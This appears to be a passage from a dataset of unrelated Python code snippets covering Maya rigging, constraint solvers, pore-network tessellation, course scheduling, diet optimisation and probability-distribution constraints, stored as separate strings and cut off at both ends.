constrain the last joint ot the last ctrl\n # mc.parentConstraint(last_nodes[-1], bind_jnts[-2], mo=1, n=bind_jnts[-2]+'_prc')\n # mc.parentConstraint(last_nodes[-1], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_prc')\n\n # if not squash_stretch:\n # mc.scaleConstraint(last_nodes[-1], bind_jnts[-2], mo=1, n=bind_jnts[-2]+'_sc')\n # mc.scaleConstraint(last_nodes[-1], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_sc')\n\n elif single_joint or number_joints == 1:\n mc.parentConstraint(last_nodes[0], bind_jnts[0], mo=1, n=bind_jnts[0]+'_prc')\n mc.scaleConstraint(last_nodes[0], bind_jnts[0], mo=1, n=bind_jnts[0]+'_sc')\n\n else:\n if squash_stretch:\n spline.preserve_volume(ctrls, bind_jnts[:-1], ctrls[0], attrs=['sy','sz'])\n\n mc.parentConstraint(bind_jnts[-2], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_prc')\n mc.scaleConstraint(bind_jnts[-2], bind_jnts[-1], mo=1, n=bind_jnts[-1]+'_sc')\n\n mc.parent(zeros[0], ctrl_grps[0])\n mc.parent(bind_jnts, jnt_grps[0])\n\n if not single_joint and number_joints == 1:\n mc.parent(bind_jnts[-1], bind_jnts[0])\n\n #utils.create_cfx_curves(self.bind_joints, self.prefix+'_'+self.part_type)\n\n if len(ctrls) > 1:\n spaces.tag(ctrls, arg='partParent:'+self.options.get('parent'))\n else:\n spaces.tag(ctrls)\n\n self.finalize_part()", "def solve(num_wizards, num_constraints, wizards, constraints): \n global wiz_const\n wiz_const = mapConstraints(wizards, constraints)\n partial_soltns = []\n\n # counter for priority queue since it doesn't allow \n # identical priorities\n k = 0\n\n # list of wizards sorted by lowest to highest degree\n sorted_wiz = sortWizByConsts(wiz_const)\n wiz_rankings = {wiz: i for i, wiz in enumerate(sorted_wiz)}\n\n const_set = set(map(tuple, constraints))\n for i in range(4) : \n heapq.heappush(partial_soltns, (0, k, nx.DiGraph(), const_set.copy()))\n k += 1\n\n print(\"setup done, commencing solving\")\n\n while len(partial_soltns) : \n\n # for partial_soltn, const_set in partial_soltns : \n# partial_soltns.remove(partial_soltn)\n num_seen, _, partial_soltn, const_set = heapq.heappop(partial_soltns)\n const = findNextConst(partial_soltn, const_set, wiz_rankings)\n print(\"seen \" + str(len(partial_soltn)) + \"\\t num partial_solutions\\t\" + str(len(partial_soltns)))\n try : \n const_set.remove(const)\n except KeyError : \n print(\"BAD SHIT\")\n pass\n possible_arrangements = [(const[0], const[1], const[2]),\n (const[2], const[0], const[1]), \n (const[2], const[1], const[0]),\n (const[1], const[0], const[2])]\n for arr in possible_arrangements:\n soltn = partial_soltn.copy()\n a, b, c = arr\n if not (soltn.has_node(a) and soltn.has_node(b) and nx.has_path(soltn, a, b)) : \n soltn.add_edge(a, b)\n if not (soltn.has_node(b) and soltn.has_node(c) and nx.has_path(soltn, b, c)) : \n soltn.add_edge(b, c)\n # see if we violated any other constraints (seen or not seen)\n is_valid, num_wiz = validNumWiz(soltn, const_set)\n\n if is_valid and len(list(nx.simple_cycles(soltn))) == 0 :\n heapq.heappush(partial_soltns, (-len(soltn), k, soltn, const_set.copy()))\n k += 1\n # are we done?\n if num_wiz == num_wizards :\n print(\"FINAL SOLUTION (found without processing all constraints but validating against them)\")\n ordering = list(nx.topological_sort(soltn))\n finishEverything(ordering, constraints)\n return ordering\n if foundCompleteOrdering(heapq.heappop(partial_soltns)) : \n print(\"FINAL SOLUTION\")\n ordering = list(nx.topological_sort(soltn))\n finishEverything(ordering, constraints)\n return ordering\n print(\"NO SOLUTION FOUND\")\n return \"\"", "def pointConstraint(*args, layer: AnyStr=\"\", maintainOffset: bool=True, name: Union[AnyStr,\n bool]=\"\", offset: Union[List[float, float, float], bool]=None, remove:\n bool=True, skip: Union[AnyStr, List[AnyStr]]=\"\", targetList: bool=True,\n weight: Union[float, bool]=0.0, weightAliasList: bool=True, q=True,\n query=True, e=True, edit=True, **kwargs)->Union[List[AnyStr], Any]:\n pass", "def _generate_throats(self):\n logger.info(\"Define connections between pores\")\n #Np = self._Np\n pts = self['pore.coords']\n Np = len(pts)\n #Generate 6 dummy domains to pad onto each face of real domain\n #This prevents surface pores from making long range connections to each other\n\n x,y,z = self[\"pore.coords\"].T\n if x.max() > self._Lx:\n Lx = x.max()*1.05\n else:\n Lx = self._Lx\n if y.max() > self._Ly:\n Ly = y.max()*1.05\n else:\n Ly = self._Ly\n if z.max() > self._Lz:\n Lz = z.max()*1.05\n else:\n Lz = self._Lz\n\n #Reflect in X = Lx and 0\n Pxp = pts.copy()\n Pxp[:,0]=(2*Lx-Pxp[:,0])\n Pxm= pts.copy()\n Pxm[:,0] = Pxm[:,0]*(-1)\n #Reflect in Y = Ly and 0\n Pyp = pts.copy()\n Pyp[:,1]=(2*Ly-Pxp[:,1])\n Pym = pts.copy()\n Pym[:,1] = Pxm[:,1]*(-1)\n #Reflect in Z = Lz and 0\n Pzp = pts.copy()\n Pzp[:,2]=(2*Lz-Pxp[:,2])\n Pzm = pts.copy()\n Pzm[:,2] = Pxm[:,2]*(-1)\n #Add dummy domains to real domain\n pts = np.vstack((pts,Pxp,Pxm,Pyp,Pym,Pzp,Pzm)) #Order important for boundary logic\n #Perform tessellation\n logger.debug(\"Beginning tessellation\")\n Tri = sptl.Delaunay(pts)\n logger.debug(\"Converting tessellation to adjacency matrix\")\n adjmat = sprs.lil_matrix((Np,Np),dtype=int)\n for i in sp.arange(0,sp.shape(Tri.simplices)[0]):\n #Keep only simplices that are fully in real domain\n #this used to be vectorize, but it stopped working...change in scipy?\n for j in Tri.simplices[i]:\n if j < Np:\n adjmat[j,Tri.simplices[i][Tri.simplices[i]<Np]] = 1\n #Remove duplicate (lower triangle) and self connections (diagonal)\n #and convert to coo\n adjmat = sprs.triu(adjmat,k=1,format=\"coo\")\n logger.debug(\"Conversion to adjacency matrix complete\")\n self['throat.conns']=sp.vstack((adjmat.row, adjmat.col)).T\n self['pore.all'] = np.ones(len(self['pore.coords']), dtype=bool)\n self['throat.all'] = np.ones(len(self['throat.conns']), dtype=bool)\n\n # Do Voronoi diagram - creating voronoi polyhedra around each pore and save vertex information\n self._vor = Voronoi(pts)\n all_vert_index = sp.ndarray(Np,dtype=object)\n for i,polygon in enumerate(self._vor.point_region[0:Np]):\n if -1 not in self._vor.regions[polygon]:\n all_vert_index[i]=dict(zip(self._vor.regions[polygon],self._vor.vertices[self._vor.regions[polygon]]))\n\n \" Add throat vertices by looking up vor.ridge_dict \"\n throat_verts = sp.ndarray(len(self[\"throat.conns\"]),dtype=object)\n for i,(p1,p2) in enumerate(self[\"throat.conns\"]):\n try:\n throat_verts[i]=dict(zip(self._vor.ridge_dict[(p1,p2)],self._vor.vertices[self._vor.ridge_dict[(p1,p2)]]))\n except KeyError:\n try:\n throat_verts[i]=dict(zip(self._vor.ridge_dict[(p2,p1)],self._vor.vertices[self._vor.ridge_dict[(p2,p1)]]))\n except KeyError:\n print(\"Throat Pair Not Found in Voronoi Ridge Dictionary\")\n\n self['pore.vert_index']=all_vert_index\n self['throat.vert_index']=throat_verts\n logger.debug(sys._getframe().f_code.co_name+\": End of method\")", "def constraint(self, item, handle, glue_item):\n start = MatrixProjection(self.start, glue_item.matrix_i2c)\n end = MatrixProjection(self.end, glue_item.matrix_i2c)\n point = MatrixProjection(handle.pos, item.matrix_i2c)\n\n cx = EqualsConstraint(point.x, start.x)\n cy = BetweenConstraint(point.y, start.y, end.y)\n\n return MultiConstraint(start, end, point, cx, cy)", "def getStrain(self, idx = None, strain = \"eps_mas\", base_1 = None, base_2 = None):\n\n \"\"\"Check if strain keyword is supported\"\"\"\n strain_avail = [\"eps_11\", \"eps_22\", \"eps_12\", \"eps_mas\", \"array\"]\n if strain.lower() not in strain_avail:\n string = \"Unrecognized strain argument: %s\" % strain\n ut.infoPrint(string)\n return\n\n \"\"\"Set some defaults\"\"\"\n if idx is None: idx = np.arange(self.atoms.shape[0])\n if isinstance(idx, (int, np.integer)): idx = [idx]\n\n if base_1 is None and base_2 is None:\n \"\"\"Send back the original strains as specified\"\"\"\n if strain.lower() == \"eps_11\":\n return self.eps_11[idx]\n elif strain.lower() == \"eps_22\":\n return self.eps_22[idx]\n elif strain.lower() == \"eps_12\":\n return self.eps_12[idx]\n elif strain.lower() == \"eps_mas\":\n return self.eps_mas[idx]\n elif strain.lower() == \"array\":\n \"\"\"Return (3,N) array with [[eps_11],[eps_22],[eps_12]]\"\"\"\n return np.vstack((self.eps_11[idx],\\\n self.eps_22[idx],\\\n self.eps_12[idx]))\n\n else:\n \"\"\"Calculate new cell vectors baded on the supplied base and the \n existing repetitions of that base\"\"\"\n\n \"\"\"Change the bottom cell vectors to match the new base\"\"\"\n if base_1 is not None:\n if isinstance(base_1, (int, np.integer)): \n base_1 = self.alt_base[base_1]\n A = np.matmul(base_1[:2, :2], self.rep_1[idx, :, :])\n else:\n A = self.cell_1[idx, :, :]\n if base_2 is not None:\n if isinstance(base_2, (int, np.integer)): \n base_2 = self.alt_base[base_2]\n B = np.matmul(base_2[:2, :2], self.rep_2[idx, :, :])\n else:\n B = self.cell_2[idx, :, :]\n\n \"\"\"Get the new strains\"\"\"\n eps_11, eps_22, eps_12, eps_mas = ut.calcStrains(a = A, b = B)\n\n if strain.lower() == \"eps_11\":\n return eps_11\n elif strain.lower() == \"eps_22\":\n return eps_22\n elif strain.lower() == \"eps_12\":\n return eps_12\n elif strain.lower() == \"eps_mas\":\n return eps_mas\n elif strain.lower() == \"array\":\n \"\"\"Return (3,N) array with [[eps_11],[eps_22],[eps_12]]\"\"\"\n return np.vstack((eps_11, eps_22, eps_12))", "def add_student_schedule_constraints_v2(solver, objective, courses, enroll_d, sched_d):\n assert SOLVER_VERSION == 2\n # enroll_d is a dictionary from frozen set of canonical course\n # names (i.e., courses taken in a term) to ints (counting how many\n # students had that set of courses)\n\n # find popular pairs of courses\n pair_count = { }\n for fs in enroll_d:\n ls = sorted(list(fs))\n for i in range(len(ls)):\n for j in range(i+1,len(ls)):\n if ls[i] not in courses and ls[j] not in courses:\n # both are cambridge courses\n continue\n \n p = frozenset((ls[i],ls[j]))\n if p not in pair_count:\n pair_count[p] = enroll_d[fs]\n else:\n pair_count[p] += enroll_d[fs]\n\n count = 0\n for p in sorted(pair_count.keys(), key=lambda k: -pair_count[k]):\n if count > PARAMS['MAX_COURSE_PAIRS']:\n break\n\n count += 1\n (cn1, cn2) = p\n # add constraints for course pair\n if cn1 not in courses:\n (cn1, cn2) = (cn2, cn1)\n\n # cn1 (and maybe cn2) are Allston courses\n assert cn1 in courses\n\n print(\"Processing course pair %s and %s, weight %s\"%(cn1,cn2,pair_count[p]))\n \n for mt1 in courses[cn1].vars_meeting_time:\n if cn2 in courses:\n for mt2 in courses[cn2].vars_meeting_time:\n dist = ss.distance_between_meeting_times(mt1, mt2)\n if dist == 0:\n # Hmmm, we probably don't want these in the same slot, but we will let the conflicts constraints handle it\n continue\n\n # !@! try this out, try to vary it\n if dist in [1,2] and {2,3} != {s[1] for s in mt1+mt2}:\n # Adjacent (or almost adjacent) and not blocking lunch (slots 2 and 3 in Allston)\n v = solver.IntVar(0, 1, \"%s,%s in %s and %s\"%(cn1,cn2,mt1,mt2))\n makeConjunction(solver, v, [courses[cn1].vars_meeting_time[mt1],courses[cn2].vars_meeting_time[mt2]])\n weight = PARAMS['WEIGHT_COMMON_COURSE_PAIR_ADJACENT_IN_ALLSTON'] if dist == 1 else PARAMS['WEIGHT_COMMON_COURSE_PAIR_ALMOST_ADJACENT_IN_ALLSTON']\n objective.SetCoefficient(v, weight * pair_count[p])\n\n else:\n assert cn2 in sched_d\n # give a bonus if mt1 is all on different days to cn2\n cts = sched_d[cn2]\n days_intersect = False\n for ind in [ss.DAYS_OF_WEEK.index(s[0]) for s in mt1]:\n for ct in cts:\n if ct.days[ind]:\n days_intersect = True\n break\n\n if not days_intersect:\n objective.SetCoefficient(courses[cn1].vars_meeting_time[mt1], PARAMS['WEIGHT_COMMON_COURSE_PAIR_DIFF_CAMPUS_DIFF_DAYS'] * pair_count[p])", "def __init__(self, center, leads, connections):\n\n if not center.is_square():\n raise ValueError(\"Center is not a square TightBinding\")\n\n self.center = center.copy()\n self.dims = center.dims\n self.leads = []\n self.connections = []\n\n for l,c in zip(leads,connections):\n self.append_lead(l,c)", "def _semiconnected_ramps(slope1=1., slope2=1.) -> cs.Network:\n\n class _Ramp(cs.Simulator):\n \"\"\"Used in tests to mock a simulator\"\"\"\n def __init__(self, slope: Fraction, step_size: Fraction):\n self._step_size = step_size\n self._x = Fraction(0)\n self._slope = slope\n\n @property\n def inputs(self):\n return {'u': sdf.InputPort(float, 1)}\n\n @property\n def outputs(self):\n return {'y': sdf.OutputPort(float, 1)}\n\n def calculate(self, input_tokens):\n self._x += self._slope * self._step_size\n return {'y': [float(self._x)]}\n\n def construct_ramp1(step_size):\n return _Ramp(slope1, step_size)\n\n def construct_ramp2(step_size):\n return _Ramp(slope2, step_size)\n\n slaves = {'Ramp1': construct_ramp1, 'Ramp2': construct_ramp2}\n\n connections = {\n cs.Dst('Ramp1', 'u'): cs.Src('Ramp2', 'y'),\n cs.Dst('Ramp2', 'u'): cs.Src('Ramp1', 'y'),\n }\n return slaves, connections", "def setUp(params, spec):\n\n if not params['fkSkeleton']:\n joints = []\n\n for x in range(params['numberOfSegments']):\n jnt = cmds.createNode('joint')\n jnt = cmds.rename(jnt, '{baseName}{index}_{JNT}'.format(baseName=spec.name, index=x, JNT=JNT)).split('|')[-1]\n if x > 0:\n cmds.parent(jnt, joints[x - 1])\n cmds.setAttr('{node}.translateY'.format(node=jnt), 1.0)\n joints.append(jnt)\n\n spec.params()['fkSkeleton'] = dragonfly.node.dfNode.fromList(joints)\n\n if not params['fkControls']:\n controls = []\n\n for x in range(params['fkNumberOfSegments']):\n ctl = cmds.curve(**CONTROL_SHAPE_DATA)\n cmds.controller(ctl)\n ctl = cmds.rename(ctl, '{baseName}{index}_{CTL}'.format(baseName=spec.name, index=x, CTL=CTL))\n match_nodes(params['fkSkeleton'][x].name(), ctl)\n if x > 0:\n cmds.parent(ctl, controls[x-1])\n controls.append(ctl)\n\n spec.params()['fkControls'] = dragonfly.node.dfNode.fromList(controls)", "def propose_patch(self, weight_bounds, learn_rate=1.0):\n in_dims, mid_dims, _, _ = weight_bounds.shape\n\n best_index = (None, None)\n best_constraints = -1\n best_delta = 0.0\n indices = itertools.product(range(in_dims), range(mid_dims))\n for in_dim, mid_dim in tqdm(indices, total=(in_dims * mid_dims),\n desc=\"Computing Patch\"):\n bounds = weight_bounds[in_dim, mid_dim, :, :]\n # We focus on the bounds that are non-NaN\n non_nan_bounds = bounds[~np.isnan(bounds[:, 0])]\n if len(non_nan_bounds) < best_constraints:\n continue\n lower, upper, n_met = self.interval_MAX_SMT(non_nan_bounds)\n\n if n_met <= best_constraints:\n continue\n best_constraints = n_met\n best_index = (in_dim, mid_dim)\n\n if lower <= 0.0 <= upper:\n best_delta = 0.0\n else:\n # True if the interval suggests to increase the weight.\n is_increase = lower > 0.0\n # If the interval suggests to increase the weight, suggest a\n # delta slightly above lower. Otherwise, suggest one slightly\n # below upper. Either way, we're trying to stay as close to 0\n # as possible.\n ratio = 0.1 if is_increase else 0.9\n best_delta = lower + (ratio * (upper - lower))\n if not np.isfinite(best_delta):\n eps = 0.1\n if is_increase: # => upper == np.Infinity\n assert np.isfinite(lower + eps)\n best_delta = lower + eps\n elif upper < 0.0: # => lower == -np.Infinity\n assert np.isfinite(upper - eps)\n best_delta = upper - eps\n else:\n assert False\n assert np.isfinite(best_delta)\n print(\"Would be satisfying\", best_constraints, \"constraints.\")\n print(\"Updating weight\", best_index)\n best_delta *= learn_rate\n return best_index, best_delta, best_constraints", "def doSetup(baseName, numberTwistJoints, knee, hip, pelvis, hipAimAxis, hipFrontAxis, pelvisAimAxis, pelvisFrontAxis):\n\ttry:\n\t\t# validate baseName\n\t\tutils.dg.validateNodeName(baseName)\n\t\t\n\t\t# validate incoming object names\n\t\tutils.dg.verifyNode(knee)\n\t\tutils.dg.verifyNode(hip)\n\t\tutils.dg.verifyNode(pelvis)\n\t\t\n\t\t# get the translation value for the knee\n\t\tkneeTranslate = cmds.getAttr('%s.translate'%knee)[0]\n\t\t\n\t\t# see if there is a side label\n\t\tbodySide = cmds.getAttr('%s.side'%hip)\n\t\t\n\t\t# find out what rotate order the hip is using\n\t\trotateOrder = cmds.getAttr('%s.rotateOrder'%hip)\n\t\t\n\t\t# create the twist joints\n\t\ttwistJoints = []\n\t\t\n\t\tfor i in range(numberTwistJoints):\n\t\t\tcmds.select(cl=True)\n\t\t\tnewJoint = cmds.joint(name='%s%s'%(baseName, i + 1))\n\t\t\t\n\t\t\t# set up the first joint\n\t\t\tif i == 0:\n\t\t\t\tnewJoint = cmds.parent(newJoint, hip)[0]\n\t\t\t\tjointRadius = 1.0\n\t\t\t\tjointOrient = []\n\t\t\t\tif cmds.objectType(hip, isType='joint'):\n\t\t\t\t\tjointRadius = cmds.getAttr('%s.radius'%hip) * 0.5\n\t\n\t\t\t\tcmds.setAttr('%s.radius'%newJoint, jointRadius)\n\t\t\t\tcmds.setAttr('%s.jointOrient'%newJoint, 0,0,0)\n\t\t\t\tcmds.setAttr('%s.translate'%newJoint, 0,0,0)\n\t\t\t\t\n\t\t\t\t# create the hip constraint\n\t\t\t\tcmds.am_hipConstraint(\n\t\t\t\t\tnewJoint,\n\t\t\t\t\tpelvisObject = pelvis,\n\t\t\t\t\thipObject = hip,\n\t\t\t\t\tha=hipAimAxis, \n\t\t\t\t\thf=hipFrontAxis, \n\t\t\t\t\tpa=pelvisAimAxis, \n\t\t\t\t\tpf=pelvisFrontAxis)\n\t\t\t# set up the rest of the joints\n\t\t\telse:\n\t\t\t\tnewJoint = cmds.parent(newJoint, hip)[0]\n\t\t\t\tcmds.setAttr('%s.radius'%newJoint, jointRadius)\n\t\t\t\tcmds.setAttr('%s.jointOrient'%newJoint, 0,0,0)\n\t\t\t\tpct = float(i)/float(numberTwistJoints)\n\t\t\t\tcmds.setAttr('%s.translate'%newJoint, kneeTranslate[0]*pct, kneeTranslate[1]*pct, kneeTranslate[2]*pct)\n\t\t\t\t\n\t\t\t\t# create the orient constraint\n\t\t\t\torientConstraint = cmds.orientConstraint([twistJoints[0], hip, newJoint])\n\t\t\t\ttargetWeights = cmds.orientConstraint(q=True, weightAliasList=True)\n\t\t\t\tcmds.setAttr('%s.%s'%(orientConstraint[0], targetWeights[0]), numberTwistJoints - i)\n\t\t\t\tcmds.setAttr('%s.%s'%(orientConstraint[0], targetWeights[1]), i)\n\t\t\t\tcmds.setAttr('%s.interpType'%orientConstraint[0], 1)\n\t\t\t\t\n\t\t\t# set label and rotate order\n\t\t\tcmds.setAttr('%s.side'%newJoint, bodySide)\n\t\t\tcmds.setAttr('%s.type'%newJoint, 18)\n\t\t\tcmds.setAttr('%s.otherType'%newJoint, 'Hip Twist %s'%(i + 1), type='string')\n\t\t\tcmds.setAttr('%s.rotateOrder'%newJoint, rotateOrder)\n\t\t\t\n\t\t\t# add the new joint to the list to return\n\t\t\ttwistJoints.append(newJoint)\n\t\t\n\t\treturn twistJoints\n\texcept: raise", "def __init__(self, nodes=\"default\", scale=0.12, enlarge=True, **kwargs):\n super().__init__(**kwargs)\n\n # joints' weight for penalty\n self._nodes = convex_nodes[nodes]\n self._scale = scale\n self._enlarge = enlarge", "def boundary_cond_dirichtlet(matriz,Tx1,Tx2,Ty1,Ty2):\n matriz[-1,:] = Tx2\n matriz[:,0] = Ty1\n matriz[:,-1] = Ty2\n matriz[0,:] = Tx1\n return matriz", "def _create_constraints(\n\t\tself,\n\t\tvariables,\n\t\tnutrients,\n\t\tfood_items,\n\t\texpressions):\n\t\tconstraints = []\n\n\t\t# Iterate all nutrients to create constraints\n\t\tfor nutrient_id, nutrient_data in nutrients.items():\n\n\t\t\tmax_nutrient_amount_constraint = pulp.LpConstraint(\n\t\t\t\te=expressions[self.NUTRIENTS_QTY_EXPRESSIONS_CATEGORY][nutrient_id],\n\t\t\t\tsense=pulp.LpConstraintLE,\n\t\t\t\trhs=nutrient_data[\"constraints\"][\"max\"],\n\t\t\t\tname= '_'.join([nutrient_id, \"max\"]))\n\t\t\tconstraints.append(max_nutrient_amount_constraint)\n\n\t\t\tmin_nutrient_amount_constraint = pulp.LpConstraint(\n\t\t\t\te=expressions[self.NUTRIENTS_QTY_EXPRESSIONS_CATEGORY][nutrient_id],\n\t\t\t\tsense=pulp.LpConstraintGE,\n\t\t\t\trhs=nutrient_data[\"constraints\"][\"min\"],\n\t\t\t\tname='_'.join([nutrient_id, \"min\"]))\n\t\t\tconstraints.append(min_nutrient_amount_constraint)\n\n\t\t\t# Demerits constrain => use max(of deviation)\n\t\t\tif self.use_demerits:\n\t\t\t\t# Nutrient variation\n\t\t\t\tnutrient_demerits_variable = variables['nutrient_demerit'][nutrient_id]\n\t\t\t\t\n\t\t\t\tnutrient_deviation_constraint = pulp.LpConstraint(\n\t\t\t\t\te=nutrient_demerits_variable - (expressions[self.NUTRIENTS_VARIATION_EXPRESSIONS_CATEGORY][nutrient_id] * nutrient_data[\"weights\"][\"overconsumption\"]),\n\t\t\t\t\tsense=pulp.LpConstraintGE,\n\t\t\t\t\trhs= 0.,\n\t\t\t\t\tname='_'.join([nutrient_id, \"dev\"]))\n\t\t\t\tconstraints.append(nutrient_deviation_constraint)\n\t\t\t\t\t\t\t\t \t\t\t\t\t\t\t\n\t\t\t\tnutrient_deviation_ve_constraint = pulp.LpConstraint(\n\t\t\t\t\te=nutrient_demerits_variable - (-expressions[self.NUTRIENTS_VARIATION_EXPRESSIONS_CATEGORY][nutrient_id] * nutrient_data[\"weights\"][\"overconsumption\"]),\n\t\t\t\t\tsense=pulp.LpConstraintGE,\n\t\t\t\t\trhs= 0.,\n\t\t\t\t\tname='_'.join([nutrient_id, \"dev_ve\"]))\n\t\t\t\tconstraints.append(nutrient_deviation_ve_constraint)\n\n\t\treturn constraints", "def joint_pairs(self):\n return [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16], #17 body keypoints\n [20-3, 23-3], [21-3, 24-3], [22-3, 25-3], [26-3, 42-3], [27-3, 41-3], [28-3, 40-3], [29-3, 39-3], [30-3, 38-3], \n [31-3, 37-3], [32-3, 36-3], [33-3, 35-3], [43-3, 52-3], [44-3, 51-3], [45-3, 50-3], [46-3, 49-3], [47-3, 48-3], \n [62-3, 71-3], [63-3, 70-3], [64-3, 69-3], [65-3, 68-3], [66-3, 73-3], [67-3, 72-3], [57-3, 61-3], [58-3, 60-3],\n [74-3, 80-3], [75-3, 79-3], [76-3, 78-3], [87-3, 89-3], [93-3, 91-3], [86-3, 90-3], [85-3, 81-3], [84-3, 82-3],\n [94-3, 115-3], [95-3, 116-3], [96-3, 117-3], [97-3, 118-3], [98-3, 119-3], [99-3, 120-3], [100-3, 121-3],\n [101-3, 122-3], [102-3, 123-3], [103-3, 124-3], [104-3, 125-3], [105-3, 126-3], [106-3, 127-3], [107-3, 128-3],\n [108-3, 129-3], [109-3, 130-3], [110-3, 131-3], [111-3, 132-3], [112-3, 133-3], [113-3, 134-3], [114-3, 135-3]]", "def test_loc_tech_carriers_ramping_constraint(self):\n m = build_model({}, \"simple_supply,two_hours,investment_costs\")\n m.run(build_only=True)\n assert not hasattr(m._backend_model, \"ramping_up_constraint\")\n assert not hasattr(m._backend_model, \"ramping_down_constraint\")\n\n m = build_model(\n {\"techs.test_supply_elec.constraints.energy_ramping\": 0.1},\n \"simple_supply,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n assert hasattr(m._backend_model, \"ramping_up_constraint\")\n assert hasattr(m._backend_model, \"ramping_down_constraint\")\n\n m = build_model(\n {\"techs.test_conversion.constraints.energy_ramping\": 0.1},\n \"simple_conversion,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n assert hasattr(m._backend_model, \"ramping_up_constraint\")\n assert hasattr(m._backend_model, \"ramping_down_constraint\")", "def constraint_for(dist=None, param=None):\n\n constraints = {\n 'atol':\n tfb.Softplus(),\n 'rtol':\n tfb.Softplus(),\n 'concentration':\n tfb.Softplus(),\n 'GeneralizedPareto.concentration': # Permits +ve and -ve concentrations.\n lambda x: tf.math.tanh(x) * 0.24,\n 'concentration0':\n tfb.Softplus(),\n 'concentration1':\n tfb.Softplus(),\n 'df':\n tfb.Softplus(),\n 'InverseGaussian.loc':\n tfb.Softplus(),\n 'JohnsonSU.tailweight':\n tfb.Softplus(),\n 'PowerSpherical.mean_direction':\n lambda x: tf.math.l2_normalize(tf.math.sigmoid(x) + 1e-6, -1),\n 'ContinuousBernoulli.probs':\n tfb.Sigmoid(),\n 'Geometric.logits': # TODO(b/128410109): re-enable down to -50\n # Capping at 15. so that probability is less than 1, and entropy is\n # defined. b/147394924\n lambda x: tf.minimum(tf.maximum(x, -16.), 15.\n ), # works around the bug\n 'Geometric.probs':\n constrain_between_eps_and_one_minus_eps(),\n 'Binomial.probs':\n tfb.Sigmoid(),\n 'NegativeBinomial.probs':\n tfb.Sigmoid(),\n 'Bernoulli.probs':\n tfb.Sigmoid(),\n 'PlackettLuce.scores':\n tfb.Softplus(),\n 'ProbitBernoulli.probs':\n tfb.Sigmoid(),\n 'RelaxedBernoulli.probs':\n tfb.Sigmoid(),\n 'cutpoints': # Permit values that aren't too large\n lambda x: tfb.Ascending().forward(10. * tf.math.tanh(x)),\n 'log_rate':\n lambda x: tf.maximum(x, -16.),\n 'mixing_concentration':\n tfb.Softplus(),\n 'mixing_rate':\n tfb.Softplus(),\n 'rate':\n tfb.Softplus(),\n 'scale':\n tfb.Softplus(),\n 'scale_diag':\n tfb.Softplus(),\n 'scale_identity_multiplier':\n tfb.Softplus(),\n 'tailweight':\n tfb.Softplus(),\n 'temperature':\n tfb.Softplus(),\n 'total_count':\n lambda x: tf.floor(tfb.Sigmoid()(x / 100.) * 100.) + 1.,\n 'Bernoulli':\n lambda d: dict(d, dtype=tf.float32),\n 'CholeskyLKJ':\n fix_lkj,\n 'LKJ':\n fix_lkj,\n 'Zipf':\n lambda d: dict(d, dtype=tf.float32),\n 'GeneralizedNormal.power':\n tfb.Softplus(),\n }\n\n if param is not None:\n return constraints.get('{}.{}'.format(dist, param),\n constraints.get(param, tfb.Identity()))\n return constraints.get(dist, tfb.Identity())", "def build_guide(self, **kwargs):\n\n # This builds your guide master and updates your options\n self.create_guide_master(**kwargs)\n\n prefix = self.prefix\n options = self.options\n mirror_value = self.mirror_value\n\n number_mid_ctrl = options.get('numberMidCtrls')\n num_joints = options.get('numberJoints')\n create_jaw = options.get('createJaw')\n create_skull = options.get('createReverseJaw')\n surface = options.get('createSurfaceDriver')\n create_fk_ctrls = options.get('createFKShaperCtrls')\n\n noxform_grp = self.guide_master + '_NOX'\n\n if mc.objExists ('drivenNeck_chest_Mid_bind'):\n mc.delete ('drivenNeck_chest_Mid_bind')\n\n\n pp = env.get_parts_paths()[-1]\n branch = r'BidepAutoRig\\part_joints\\neck_skel.mb'\n import_path = pp.replace('partsLibrary', branch)\n mc.file(import_path, i=1)\n\n if mc.objExists ('snap_chest_Mid_jnt'):\n mc.delete (mc.parentConstraint ('snap_chest_Mid_bind', 'drivenNeck_chest_Mid_bind'))\n\n\n snaps=[u'head_Mid_bind', u'headEnd_Mid_jnt', u'eye_Lt_bind', u'eye_Rt_bind', u'headTop_Mid_bind',\n u'headRear_Mid_bind', u'headSide_Lt_bind', u'headSide_Rt_bind', u'neck01_Mid_bind', u'neck02_Mid_bind',\n u'neck03_Mid_bind', u'neckEnd_Mid_jnt']\n\n for snap in snaps:\n target='snap_'+snap\n if mc.objExists (target):\n mc.delete (mc.parentConstraint (target, snap))\n\n\n\n\n # This finalizes your guide.\n self.finalize_guide()\n jnts_grp = self.guide_master + '_JNTS'\n mc.parent ('drivenNeck_chest_Mid_bind', jnts_grp)\n\n self.finalize_guide()", "def buildcutlineset():\r\n cutlineset=[[[-3.2697,-3.2697],[-4.3304,-4.3304]],[[-3.2697,-4.3304],[-4.3304,-3.2697]]]\r\n cutlineset.extend([[[-3.2697,176.0104],[-4.3304,174.9497]],[[-3.2697,174.9497],[-4.3304,176.0104]]])\r\n cutlineset.extend([[[176.0104,176.0104],[174.9497,174.9497]],[[176.0104,174.9497],[174.9497,176.0104]]])\r\n cutlineset.extend([[[175.4800,-3.05],[175.4800,-4.55]],[[174.7300,-3.8],[176.2300,-3.8]]])\r\n \r\n for cutline in cutlineset:\r\n for pos in cutline:\r\n pos[0]=pos[0]+globalconfig.CUTLINE_X_OFFSET\r\n pos[1]=pos[1]+globalconfig.CUTLINE_Y_OFFSET\r\n \r\n for row in range(0,globalconfig.X_ARRAY_NUM):\r\n cutlineset.append([[globalconfig.X_BLANK+row*(globalconfig.X_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_X_OFFSET,0.0+globalconfig.CUTLINE_Y_OFFSET],[globalconfig.X_BLANK+row*(globalconfig.X_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_X_OFFSET,-3.0+globalconfig.CUTLINE_Y_OFFSET]])\r\n cutlineset.append([[globalconfig.X_BLANK+row*(globalconfig.X_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_X_OFFSET,171.68+globalconfig.CUTLINE_Y_OFFSET],[globalconfig.X_BLANK+row*(globalconfig.X_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_X_OFFSET,174.68+globalconfig.CUTLINE_Y_OFFSET]])\r\n for line in range(0,globalconfig.Y_ARRAY_NUM):\r\n 